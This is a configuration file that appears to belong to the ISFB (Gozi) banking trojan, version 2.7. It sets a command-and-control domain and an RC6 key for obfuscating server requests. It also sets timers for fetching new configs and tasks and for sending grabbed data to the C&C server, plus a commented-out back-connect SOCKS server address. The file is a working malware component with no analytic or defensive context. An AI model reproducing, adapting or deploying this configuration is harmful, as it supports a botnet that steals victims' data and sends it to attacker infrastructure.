; Client initialization file for ISFB 2.7

; Default C&C hosts
Hosts = repeseparation.ru

; Target server ID
Server = 12

; RC6-key used for obfuscating server requests
ServerKey = 0123456789ABCDEF

; Time interval to check for a new config (seconds)
ConfigTimeout = 300

; Time interval to check for a config when there's no config installed (seconds)
ConfigFailTimeout = 300

; Time interval to check new task (seconds)
TaskTimeout = 300

; Time interval to send grabbed data (seconds)
SendTimeout = 300

; Time interval to check new task from the Explorer (if enabled) (seconds)
KnockerTimeout = 300

; Time interval to send BC request (seconds)
BcTimeout = 10

; Current group index
Group = 1000

; Back-connect server for SOCKS address
;BcServer = 64.120.216.250:9955
